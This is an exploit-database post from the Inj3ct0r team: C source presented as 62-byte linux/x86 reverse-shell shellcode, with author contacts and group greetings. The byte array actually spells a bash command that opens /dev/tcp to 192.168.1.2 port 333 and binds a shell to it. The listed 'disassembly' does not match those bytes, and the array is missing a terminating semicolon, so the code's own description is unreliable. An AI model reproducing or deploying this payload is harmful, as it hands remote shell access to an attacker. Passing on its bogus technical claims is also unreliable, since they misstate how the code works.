|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
###
# Title : linux/x86 BackShell-TCP bash[/dev/tcp],execve(/bin/sh),port 333 - 62 bytes
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com) kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# Friendly Sites : www.dis9.com * www.r00tw0rm.com * www.exploit-id.com
# platform : linux/x86
# Type : shellcode - 62 bytes
# Security Risk : Critical
# Tested on : Linux.(Ubuntu 10.10)
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##
*/
#include <stdio.h>
#include <string.h>
char sc[] =
// bash_exec :
"\x30\x3c\x26" // xor %esi,%bh
"\x37" // aaa ;ARG
"\x33\x2d\x3b\x65\x78\x65" // xor %ebp,dword $0x6578653b
"\x63\x20" // arpl word %eax,%sp
"\x37" // aaa ;ARG
"\x33\x3c\x3e" // xor %edi,dword %esi %edi
// conf_bash (/dev/tcp/192.168.1.2/333)
"\x2f" // das
"\x64" // prefix fs
"\x65\x76\x2f" // jbe short
"\x74\x63" // je short
"\x70\x2f" // jo short
"\x31\x39" // xor dword %ecx,%edi
"\x32\x2e" // xor %ch,%esi
"\x31\x36" // xor dword %esi,%esi
"\x38\x2e" // cmp %esi,%ch
"\x31\x2e" // xor dword %esi,%ebp
"\x32\x2f" // xor %ch,%edi
"\x33\x33" // xor %esi,dword %ebx
"\x33\x3b" // xor %edi,dword %ebx
// execve(/bin/sh) after back-connect
"\x73\x68" // jnb short
"\x20\x3c\x26" // and %esi,%bh
"\x37" // aaa ;ARG
"\x33\x20" // xor %esp,dword %eax
"\x3e" // prefix ds
"\x26\x37" // aaa
"\x33\x20" // xor %esp,%eax
"\x32\x3e" // xor %bh,%esi
"\x26\x37" // aaa ;ARG
"\x33\x7c\xff\xff" // xor %edi,dword %edi,%edi
int main()
{
int (*dz)() = (int(*)())sc;
printf("bytes: %u\n", strlen(sc));
dz();
}
/*
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TrOoN
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================*/
|